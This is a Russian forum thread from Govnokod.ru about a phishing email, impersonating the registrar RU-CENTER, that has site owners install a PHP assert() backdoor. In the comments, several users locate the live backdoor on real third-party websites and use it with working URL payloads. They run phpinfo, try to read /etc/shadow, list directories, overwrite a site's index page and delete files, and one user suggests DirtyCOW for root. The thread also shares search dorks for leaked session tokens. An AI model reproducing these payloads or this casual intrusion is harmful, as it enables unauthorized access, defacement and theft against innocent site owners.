Говнокод #21954 — PHP — Говнокод.ру

PHP / Говнокод #21954

−31
1. 01
2. 02
3. 03
4. 04
5. 05
6. 06
7. 07
8. 08
9. 09
10. 10
11. 11
12. 12
13. 13
14. 14
15. 15
16. 16
17. 17
18. 18
19. 19
20. 20
21. 21
22. 22
23. 23
24. 24
25. 25
26. 26
27. 27
```
Уважаемый клиент!

В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить,
что фактическое управление доменом ******* осуществляется лицом,
указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом,
создайте в корневой директории сайта файл a7offau08fn0f81n.php со следующим
содержимым:

<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>

Файл должен быть создан в течение трех рабочих дней с момента получения
настоящего письма и находиться на сервере до 24 декабря 2016 года, 20:00
(UTC+03:00), в противном случае процедура подтверждения не будет пройдена.

Обращаем Ваше внимание на то, что если процедура подтверждения не будет
пройдена, делегирование домена будет приостановлено.

© АО «Региональный Сетевой Информационный Центр» (RU-CENTER)
8 800 775-29-99, 8 800 250-27-99,
+7 495 994-46-01

Вы подписались на рассылку в настройках уведомлений.
Отписаться от рассылки
```
Мошеннические письма под видом писем от RU-CENTER

интересно, почему не eval() ?

Запостил: j123123, 07 Января 2017

Tweet
Комментарии (131) RSS
- guest 07.01.2017 20:09 # +4
  
  PHP - гениальный язык.
  Интересно, в какой функции здесь remote code execution - в stripslashes или в assert? Не удивлюсь, если в обоих.
  Ответить
  - bormand 07.01.2017 20:12 # +5
    
    If the assertion is given as a string it will be evaluated as PHP code by assert(). The advantages of a string assertion are less overhead when assertion checking is off and messages containing the assertion expression when an assertion fails.
    
    Царь проектировал.
    Ответить
    - bormand 07.01.2017 20:21 # 0
      
      Само собой, строку для ассёрта надо писать в одинарных кавычках.
      Ответить
      
      guest 07.01.2017 20:59 # −6
      
      показать все, что скрытоА тебя надо пялить когда ты в колготках
      Ответить
- 1024-- 07.01.2017 20:58 # +3
  
  > интересно, почему не eval() ?
  Более подозрительная питушня. Если не знаешь пхп в совершенстве, не начнёшь подозревать assert.
  Ответить
  - defecate-plusplus 07.01.2017 20:59 # 0
    
    василии™ с пыхой на сервере должны страдать
    Ответить
  - inkanus-gray 07.01.2017 21:50 # 0
    
    А много ли людей знают пхп в совершенстве?
    Ответить
    - defecate-plusplus 07.01.2017 22:00 # +1
      
      полагаю, все те, кто хоть раз открывал "PHP для проффессионналов"
      Ответить
    - 1024-- 07.01.2017 22:02 # +5
      
      Наверно нет. Люди в большинстве случаев либо не знают PHP, либо используют другие языки. Прослойка профессионалов в PHP крайне мала. Людей не хватает, они за очень большие деньги пишут Facebook и рассылают письма от имени RU-CENTER.
      Ответить
      
      bakagaijin 07.01.2017 23:47 # +2
      
      Дейтинги, дейтинги ещё. За большие деньги. Большие.
      Ответить
      
      barop 08.01.2017 02:51 # +2
      
      Дейтинги?
      Это где сорокапятиилетний жадный девственник с лысиной, пузом и отдышкой, живущий с мамой, и любящий играть в танчики пытается найти девушку своей мечты?
      Ответить
      
      bakagaijin 08.01.2017 17:07 # +2
      
      Помню, писал когда-то индексирующего бота для мамбы. Потом мамба добавила капчу. Я аж загордился тогда.
      Ответить
      
      bormand 08.01.2017 17:09 # +1
      
      > индексирующего бота
      Надо было ещё ИИ для знакомства.
      Ответить
      
      bakagaijin 08.01.2017 19:32 # 0
      
      Не, разводом дрочеров на "кинь мне денег на телефон и я позвоню" не занимался. Так, базка для личного пользования, чтобы искать по параметрам не тем куцым мамбиным поиском. И, что интересно, пару раз успешно использовал.
      Ответить
      
      barop 09.01.2017 13:06 # −2
      
      Искал себе спутницу жизни на мамбе?
      
      Фу
      Ответить
      
      huge_cock 09.01.2017 13:44 # +3
      
      Зачем сразу "фу"? Он мог там искать и спутника.
      Ответить
      
      barop 09.01.2017 13:46 # 0
      
      Нашел тебе спутника, проверь
      Ответить
      
      huge_cock 09.01.2017 13:57 # +1
      
      Плохой спутник. Прошу вернуть деньги. Чек прилагаю.
      Ответить
      
      guest 10.01.2017 08:53 # 0
      
      Держи деньги, отослал спутника твоей мамке, проверь.
      Ответить
      
      guest 10.01.2017 06:45 # 0
      
      На чем? Готовые поисковые движки не использовал?
      
      Капча то хуйня, в общем-то.
      Ответить
      
      bakagaijin 10.01.2017 12:45 # −1
      
      Вспомню - вздрогну. Classic ASP, JScript. Вытягивалась страница, парсилась регэкспами (ага-ага, странно, что Ктулху не вызвал), потом вытягивалась следующая, и так далее. Брр. Но работало.
      Ответить
      
      barop 10.01.2017 13:06 # −1
      
      По какой-то причине практически весь классик асп, коий я видел в жизни, был не на JS а на VBS.
      Сложно сказать что хуже.
      Ответить
      
      bakagaijin 10.01.2017 13:34 # 0
      
      По идее, JS позволяет писать более изящно. Но это был 2005 год, и слова "JS" и "изящность" в одном предложении никто по-моему не употреблял.
      Ответить
- Xom94ok 07.01.2017 21:08 # +1
  
  Узбекский вирус 2.0 штоле? (Sorry, PHP is not my native language)
  Ответить
- guestinho 07.01.2017 22:09 # +2
  
  Если хоть 1 долбоёб из 100 поведётся - уже профит
  Ответить
- dm_fomenok 07.01.2017 23:38 # +7
  a7offau08fn0f81n.php:
  
  <?php echo 'Хакнуть меня тут решил, пездюк?'; ?>
  Ответить
- j123123 08.01.2017 13:00 # +4
  
  Не у всех даже получается залить себе этот бекдор
  http://psyaba.ru/index/a7offau08fn0f81n_php/0-31
  http://monrostudio.ru/a7offau08fn0f81n-php
  Ответить
  - bormand 08.01.2017 13:05 # 0
    
    А если и получится - надо же ещё ассёрты включить в конфиге...
    Ответить
    - inkanus-gray 08.01.2017 13:33 # +1
      
      Кому-то даже удалось залить:
      http://www.balans-auto.ru/a1offau08f10z81n.php
      Ответить
      
      inkanus-gray 08.01.2017 13:37 # +3
      
      P.S. Работает!
      
      http://www.balans-auto.ru/a1offau08f10z81n.php?R01=printf('TbI+XYU ');
      http://www.balans-auto.ru/a1offau08f10z81n.php?R01=phpinfo();
      Ответить
      
      inkanus-gray 08.01.2017 13:44 # 0
      
      А рута нет, печалька:
      http://www.balans-auto.ru/a1offau08f10z81n.php?R01=var_dump(file('/etc/shadow'));
      Ответить
      
      j123123 08.01.2017 13:51 # 0
      
      DirtyCOW попробуй
      Ответить
      
      inkanus-gray 08.01.2017 13:54 # 0
      
      Попробуем выяснить, что можно натворить без рута:
      http://www.balans-auto.ru/a1offau08f10z81n.php?R01=var_dump(scandir('/home/c17271/public_html'));
      Ответить
      
      inkanus-gray 08.01.2017 16:05 # 0
      
      file_put_contents работает:
      
      http://www.balans-auto.ru/a1offau08f10z81n.php?R01=file_put_contents%28%27/home/c17271/public_html/balans-auto/index.html%27,%20%27%3Cmeta%20http-equiv=%22Content-Type%22%20content=%22text/html;%20charset=UTF-8%22%3E%3Cp%3E%D0%97%D0%B4%D0%B5%D1%81%D1%8C%20%D0%B1%D1%8B%D0%BB%20%D0%92%D0%B0%D1%81%D1%8F.%3C/p%3E%27%29;
      
      Пруф, что сработало, проверьте:
      http://www.balans-auto.ru/
      Ответить
      
      defecate-plusplus 08.01.2017 16:11 # +2
      
      учитывая, что до тебя там вообще нихуя не было, это есть ловкий ход владельца
      
      через неделю ему напишут сайт-визитку, а через три он обеспечит прибылью своих внуков
      Ответить
      
      inkanus-gray 08.01.2017 16:19 # 0
      
      А потом кто-нибудь захочет узнать историю компании, загуглит доменное имя и попадёт на Говнокод, где написано про анналы и багры.
      Ответить
      
      huge_cock 08.01.2017 16:22 # 0
      
      Всё ж таки два "н"...
      Ответить
      
      defecate-plusplus 08.01.2017 16:19 # 0
      
      created: 2010.01.26
      paid-till: 2017.01.26
      
      вебархив дает странную картину, в 2014 было че-то, в 2015 уже грусть
      Ответить
      
      bormand 08.01.2017 16:22 # 0
      
      > в 2015 уже грусть
      Кто-то проверил, что работает unlink()?
      Ответить
      
      huge_cock 08.01.2017 16:24 # 0
      
      Почему бы и нет, если народ требует? Здесь каждый день по сто раз умоляют что-нибудь проверить.
      Ответить
      
      inkanus-gray 08.01.2017 16:27 # 0
      
      Только почему-то проверяют не всё, а выборочно.
      Ответить
      
      defecate-plusplus 08.01.2017 16:31 # +1
      
      ничего, пережили же плавающего питуха, анскильного питуха
      
      огромного питуха тут тоже переживут
      Ответить
      
      inkanus-gray 08.01.2017 17:47 # 0
      
      https://youtu.be/I8dWDZslwt8
      Ответить
      
      huge_cock 08.01.2017 16:32 # +3
      
      Ну, а тебе не надоело по десять раз на дню находить за своей щекой всё новые и новые сюрпризы?
      Ответить
      
      inkanus-gray 08.01.2017 16:33 # 0
      
      Проверял, сюрпризов не было. Как год назад залечил зубы, так с той поры пока не беспокоили.
      Ответить
      
      huge_cock 08.01.2017 16:35 # 0
      
      Могу и побеспокоить, если опостылело однообразие жизни.
      Ответить
      
      huge_cock 08.01.2017 16:13 # +1
      
      Проверил. Работает.
      
      P.S.: Я про "unlink()".
      Ответить
      
      inkanus-gray 08.01.2017 16:15 # 0
      
      Теперь там мой никнейм останется навечно?
      Ответить
      
      huge_cock 08.01.2017 16:16 # 0
      
      Да, твоё имя отныне навеки впечатано в скрижали истории.
      Ответить
      
      bormand 08.01.2017 16:16 # +2
      
      Не побоюсь этого слова, в анналы.
      Ответить
      
      huge_cock 08.01.2017 16:17 # +2
      
      Его и нечего бояться. Что естественно, то не безобразно.
      Ответить
      
      barop 09.01.2017 13:05 # 0
      
      Не испугался тебя, проверь
      Ответить
      
      defecate-plusplus 08.01.2017 16:25 # +2
      
      закономерный бесславный итог.
      Ответить
      
      huge_cock 08.01.2017 16:18 # 0
      
      Кстати, кто там пиздел про союз нерушимых республик?
      Ответить
      
      huge_cock 09.01.2017 13:30 # +3
      
      Шло девятое января. Владельцу сайта всё так же было похуй на багры и на то, что кто-то кого-то ебал во все дыры...
      Ответить
      
      inkanus-gray 09.01.2017 13:38 # 0
      
      Отмотаем время на сто шагов назад...
      
      2 октября 2016: Приветствуем! Сайт balans-auto.ru только что создан.
      
      7 марта 2016: Приветствуем! Сайт balans-auto.ru только что создан.
      
      9 января 2016: Приветствуем! Сайт balans-auto.ru только что создан.
      
      16 ноября 2015: Приветствуем! Сайт balans-auto.ru только что создан.
      
      1 августа 2015: Приветствуем! Сайт balans-auto.ru только что создан.
      
      16 декабря 2014: Автоломбард по займу денег в Москве - +7929-636-7575 Круглосуточно
      
      Таким образом, сайт исчез в промежутке между 16 декабря 2014 и 1 августа 2015. Значит, владельцу похуй уже полтора-два года.
      Ответить
      
      inkanus-gray 26.01.2017 13:43 # +2
      
      Шло двадцать шестое января. На сайт залили новое содержимое. Но Яндекс по-прежнему думает, что сайт про багры, а другие поисковики не торопятся его индексировать:
      
      https://yandex.ru/search/?text=site%3Abalans-auto.ru
      
      https://www.google.ru/search?q=site%3Abalans-auto.ru
      
      http://www.bing.com/search?q=site%3Abalans-auto.ru
      Ответить
  - inkanus-gray 08.01.2017 13:30 # +3
    
    Я надеялся, там уникальный идентификатор, а оказалось, что этот id одинаков для всех...
    
    http://oknacolor.ru/a7offau08fn0f81n.php
    
    P.S. Гуглим ещё это:
    a7odfa980f11ce6.php
    a7offau12fn0f83f.php
    a1offau08f10z81n.php
    a1offau08fn0f81n.php
    Ответить
    - bormand 08.01.2017 18:32 # −1
      
      Кстати, а как гугл узнал, что надо проиндексировать эти страницы?
      Ответить
      
      inkanus-gray 08.01.2017 18:35 # +1
      
      Возможно, у «кулхацкеров» было установлено какое-то браузерное расширение для анализа страниц, которое отправляет запросы на индексацию.
      
      Говорят, в своё время куча эсэмэсок, отправленных пользователям «Мегафона», утекли в сеть благодаря Яндекс.Бару, потому что там была авторизация через get-параметр.
      
      А за пользователями Хрома иногда ходит Гуглобот...
      Ответить
      
      bormand 08.01.2017 18:41 # 0
      
      > авторизация через get-параметр
      facepalm.jpg
      Ответить
      
      inkanus-gray 08.01.2017 18:55 # 0
      
      До сих пор на некоторых форумах есть эмуляция кук через get-параметр. Загугли:
      inurl:sessid
      inurl:sessionid
      inurl:session_id
      inurl:phpsessid
      inurl:phpsessionid
      inurl:phpsession_id
      
      И ещё что-нибудь в таком духе.
      
      Ещё некоторые сайты (сайты знакомств, интернет-магазины) присылают по е-мейлу уведомления о новых событиях, а в письмо вкладывают ссылку с токеном для авторизации. Если такая ссылка утечёт в поисковик, то поисковик сможет выполнять действия от твоего имени...
      Ответить
      
      bormand 08.01.2017 18:58 # 0
      
      > поисковик сможет выполнять действия от твоего имени
      Забавно будет, если действия тоже через get.
      Ответить
      
      inkanus-gray 08.01.2017 18:58 # 0
      
      Довольно часто logout сделан через get. Если это будет первым действием, которое выполнит поисковик, то ничего интересного не произойдёт.
      Ответить
      
      defecate-plusplus 08.01.2017 19:13 # +2
      
      Если токен не одноразовый, то ссзб.
      Для пыхопитушни, однако, обычное дело
      
      Более того, такой одноразовый токен и нужен то только для восстановления пароля. В остальных случаях юзера надо для начала на страницу логина сводить (если куки отсутствуют при достижении целевой страницы)
      Ответить
      
      inkanus-gray 08.01.2017 19:21 # −1
      
      Делаем вывод: vkrugudruzei.ru и fotostrana.ru — пыхопитушня. А ведь на них обитают несколько миллионов пользователей...
      Ответить
      
      bormand 08.01.2017 19:22 # 0
      
      Ну пейсбук и втентакль тоже пыхопетушня...
      Ответить
      
      inkanus-gray 08.01.2017 19:23 # +2
      
      На них (по крайней мере, сейчас) нет такой чепухи с get-параметрами.
      
      Говорят, что в Одноклассниках когда-то давным давно sessionid был в get-параметрах, но потом убрали.
      Ответить
      
      bormand 08.01.2017 19:25 # +1
      
      > Одноклассниках
      Зато они логин по хттп до последнего держали.
      Ответить
      
      inkanus-gray 08.01.2017 19:26 # 0
      
      Более того, у них был редирект с https на http, если в форме логина не поставить галочку «использовать шифрование». Только недавно исправили.
      Ответить
      
      bormand 08.01.2017 19:27 # −1
      
      Там была такая галочка?
      
      З.Ы. Кстати, на рутрекере она тоже есть.
      Ответить
      
      inkanus-gray 08.01.2017 19:28 # +2
      
      Да. Они работали по https, только если при логине установить галочку «Использовать шифрование», иначе редиректили на http. Т. е. пользователь должен был явно указать, что ему есть что скрывать от своего провайдера и от спецслужб.
      
      Только несколько месяцев назад всех перевели на https и галочку убрали.
      Ответить
      
      guest 10.01.2017 06:51 # +3
      
      Или соседей по хотспоту. Или владельца прокси или ноды тора (актуально для русракера и порнолаба).
      Ответить
      
      inkanus-gray 08.01.2017 19:30 # −1
      
      P.S. Кстати, Рутрекер сейчас у меня по http заблокирован (отображается провайдерская заглушка), а по https работает.
      Ответить
      
      bormand 08.01.2017 19:31 # −1
      
      > а по https работает
      Это у всех так, походу. В кои-то веки можно залогиниться и поюзать нормальный поиск...
      Ответить
      
      inkanus-gray 08.01.2017 19:32 # 0
      
      С блокировками вообще весело. Бывает так, что сайт с www заблокирован, а без www работает. Или, например, заблокирована только главная страница.
      Ответить
      
      guest 10.01.2017 06:51 # 0
      
      >В кои-то веки можно залогиниться и поюзать нормальный поиск...
      Не понял.
      Ответить
      
      bormand 10.01.2017 06:57 # 0
      
      Для гостей там только поиск гугла. А он неудобный - не показывает качество и т.п., приходится тупо ссылки подряд прокликивать.
      Ответить
      
      guest 10.01.2017 07:05 # 0
      
      >В кои-то веки можно залогиниться
      Ответить
      
      guest 10.01.2017 08:28 # 0
      
      Залогинился в твое очко, проверь.
      Ответить
      
      huge_cock 10.01.2017 08:35 # 0
      
      Сменил пароль, проверь.
      Ответить
      
      guest 10.01.2017 08:55 # −1
      
      Доступ закрыт, произвожу вход в твою ротовую полость, проверь.
      Ответить
      
      huge_cock 10.01.2017 08:58 # +2
      
      Вы входите из необычного местоположения. Код верификации отправлен Вам по SMS, проверьте.
      Ответить
      
      guest 10.01.2017 10:30 # −1
      
      Вот черт, телефон забыл в твоём анусе. После вибрации звонков и SMS - осталось на твоём лице блаженство.
      Ответить
      
      guest 10.01.2017 14:38 # −1
      
      накидал немного блаженства тебе за щеку,проверь
      Ответить
      
      bormand 10.01.2017 17:49 # −1
      
      > кои-то веки можно залогиниться
      Ну через тор-браузер неудобно же.
      Ответить
      
      defecate-plusplus 10.01.2017 18:02 # −1
      
      у меня фсбшный аддон frigate прекрасно справлялся с доступом к джойкрутрекеру все это время
      Ответить
      
      bormand 10.01.2017 18:22 # 0
      
      > фсбшный аддон
      Да на крайний случай можно и голландцем прикинуться в пару команд... А аддоны я не люблю, да и ставить их лень.
      Ответить
      
      inkanus-gray 11.01.2017 00:41 # −1
      
      Frigate ко всем запросам добавляет HTTP-заголовок Proxy-Authorization, содержащий уникальный идентификатор экземпляра аддона, проверь.
      Ответить
      
      barop 11.01.2017 00:45 # −1
      
      Так есть же https://antizapret.prostovpn.org/proxy.pac
      
      Там внутрях найдешь ты хттпс проксю, на которую можно ходить даже если сайт не забанен
      
      Правда никто не умеет в настройки прокси по хттпс без PAC: только хром может если сказать --proxy=
      Ответить
      
      guest 10.01.2017 06:50 # 0
      
      Это же обсуждали здесь когда-то, там много что уже не на php, нет?
      Ответить
- huge_cock 08.01.2017 16:34 # +3
  
  Ничего, известная биржа фpиланса вообще была похекана через ссаный "WebDаv" с открытым портом.
  Ответить
  - inkanus-gray 08.01.2017 16:39 # −1
    
    Ух ты! И что же за биржа с такими беспечными админами?
    Ответить
    - huge_cock 08.01.2017 16:40 # +2
      
      https://habrahabr.ru/post/263703/
      Ответить
      
      inkanus-gray 08.01.2017 16:42 # −1
      
      Очередной? Ничоси! А её что, два раза хакали?
      Ответить
      
      huge_cock 08.01.2017 16:43 # +3
      
      https://habrahabr.ru/post/251487/
      Ответить
      
      inkanus-gray 08.01.2017 16:46 # +1
      
      Какой багор!
      Ответить
      
      huge_cock 08.01.2017 16:47 # 0
      
      Воистину.
      Ответить
      
      bormand 08.01.2017 17:07 # −1
      
      Интересно, в комментах тот самый konardo упоминается?
      Ответить
      
      huge_cock 08.01.2017 17:12 # 0
      
      Он ещё где-то засветился?
      Ответить
      
      bormand 08.01.2017 17:23 # 0
      
      Здесь на ГК одно время тусовался некто с ником konardo.
      Ответить
      
      huge_cock 08.01.2017 17:26 # +1
      
      Судя по его переписке, сохранившейся в "WebArchive", это может быть и он. Такой же быдляцки-"Govnokod"-ерский стиль письма.
      Ответить
- inkanus-gray 08.01.2017 18:19 # 0
  
  Братишки, я ещё покушать принёс:
  http://kkblog.ru/phishing-spam/
  
  Прямая ссылка на скриншот, чтобы не читать много буков:
  http://kkblog.ru/wp-content/uploads/2016/12/rkn-phishing.png
  
  P.S.:
  https://habrahabr.ru/post/265515/
  Ответить
  - bormand 08.01.2017 20:50 # +2
    
    Кстати, а ведь неплохое заметание следов - написать статью на хабр. Хабронелюди всю траву вытопчут, настоящего хозяина ботнета потом хуй найдёшь среди них...
    Ответить
    - inkanus-gray 09.01.2017 13:20 # +4
      
      Почти как в шутке: «Убит спамер. Полиции осталось допросить 3 миллиона подозреваемых».
      Ответить
- j123123 11.12.2019 22:08 # +3
  
  opennet, "Релиз языка программирования PHP 7.3"
  
  Аноним (9):
  Язык весьма неплохой. В каждой функции есть своя изюминка. Например, при помощи file_exists() можно не только проверить существование файла, но и начать выполнять код, заботливо предоставленный третьей стороной. Удобная фича, рекомендую.
  
  Если в вашем языке функция проверки существования файла не способна запускать код, просьба меня не беспокоить.
  Ответить
  - XYPO3BO3 11.12.2019 22:13 # 0
    
    Именно поэтому я за «PHP».
    Ответить
  - guest8 11.12.2019 22:14 # −999
    
    показать все, что скрытоvanished
    Ответить
  - Stallman 11.12.2019 22:27 # 0
    
    Как можно заставить эту функцию выполнять код?
    Ответить
    - gost 11.12.2019 22:40 # +1
      
      https://blog.ripstech.com/2018/new-php-exploitation-technique/
      Ответить
      
      Stallman 11.12.2019 22:59 # 0
      
      Какой РНАЯ )))))
      Но вроде ж поддержка этого говна по дефолту выключена в РНР.ІИI...
      Ответить
      
      XYPO3BO3 11.12.2019 23:16 # 0
      
      Только что проверил. У меня есть под рукой интерпретатор «РНР», в «РНР.1И1» никаких настроек для «РНАЯ» нет, но при этом «РНАЯ» работает.
      Ответить
      
      guest8 11.12.2019 23:20 # −999
      
      показать все, что скрытоvanished
      Ответить
      
      zhigolo 11.12.2019 23:22 # 0
      
      Подруга, ты никак не можешь жить на Чичерине: во первых, он был пидором, во-вторых, умер уже.
      Ответить
      
      inkanus_gray 11.12.2019 23:22 # 0
      
      Ж-ж-жиголо? Тебя же забанили!
      Ответить
      
      zhigolo 11.12.2019 23:23 # 0
      
      :-) разбанился.
      Ответить
      
      Stallman 11.12.2019 23:38 # 0
      
      Нашел у себя целую секцию этого говна. Но полностью отключить таки нельзя...
      
      [Phar] ; http://php.net/phar.readonly ;phar.readonly = On ; http://php.net/phar.require-hash ;phar.require_hash = On ;phar.cache_list =
      Ответить
      
      XYPO3BO3 12.12.2019 00:01 # 0
      
      И код не подгружается как расширение через .so/.dll, а вкомпилирован в интерпретатор.
      
      Чтобы отключить, нужно перекомпилировать, предварительно запустив ./configure --disable-phar.
      Ответить
      
      XYPO3BO3 12.12.2019 00:07 # 0
      
      Итого: чтобы обезопасить сервер, нужно проверять все ссылки, передаваемые файловым функциям, которые умеют использовать врапперы, чтобы эти ссылки не начинались на "phar://".
      Ответить
- gost 11.12.2019 22:42 # 0
  
  http://www.psyaba.ru/load/1
  Какой багор )))
  Ответить
  - guestinxo 11.12.2019 22:46 # 0
    
    Можно создать файл, но не под апачем.
    Какая смекалка )))
    Ответить
  - guest8 11.12.2019 22:52 # −999
    
    показать все, что скрытоvanished
    Ответить
  - XYPO3BO3 11.12.2019 22:59 # 0
    
    На «Юкозе» вроде только в платных учётках можно использовать «PHP» (да и то там какие-то адские ограничения), потому и не исполнилось?
    Ответить
    - guestinxo 11.12.2019 23:01 # 0
      
      Именно поэтому я против «Юкоза».
      Ответить
      
      XYPO3BO3 11.12.2019 23:13 # 0
      
      Да, хостинги без «PHP» или без «MySQL» не нужны.
      Ответить
      
      guest8 11.12.2019 23:15 # −999
      
      показать все, что скрытоvanished
      Ответить
  - j123123 11.12.2019 23:19 # 0
    
    >Друзья сайта
    >Центр гомеопатии в Куркино
    Хмм.. Интересно, бывает ли гомеопатическая психология?
    Ответить
    - gost 11.12.2019 23:37 # 0
      
      Тебе надо просто взять себя в руки!
      Ответить
      
      XYPO3BO3 12.12.2019 01:06 # +1
      
      Или выйти из зоны комфорта!
      Ответить
      
      guest8 12.12.2019 01:12 # −999
      
      показать все, что скрытоvanished
      Ответить
- guest8 11.12.2019 22:45 # −999
  
  показать все, что скрытоvanished
  Ответить
Добавить комментарий
Ошибка компиляции комментария:

Гости могут высказаться только в понедельник, среду, четверг или воскресение
Я, guest, находясь в здравом уме и твердой памяти, торжественно заявляю:

А не использовать ли нам bbcode?

[b]жирный[/b] — жирный

[i]курсив[/i] — курсив

[u]подчеркнутый[/u] — подчеркнутый

[s]перечеркнутый[/s] — перечеркнутый

[blink]мигающий[/blink] — мигающий

[color=red]цвет[/color] — цвет (подробнее)

[size=20]размер[/size] — размер (подробнее)

[code=<language>]some code[/code] (подробнее)

Проверочный код: *

Говнокод: по колено в коде.

PHP / Говнокод #21954

Комментарии (131) RSS

Добавить комментарий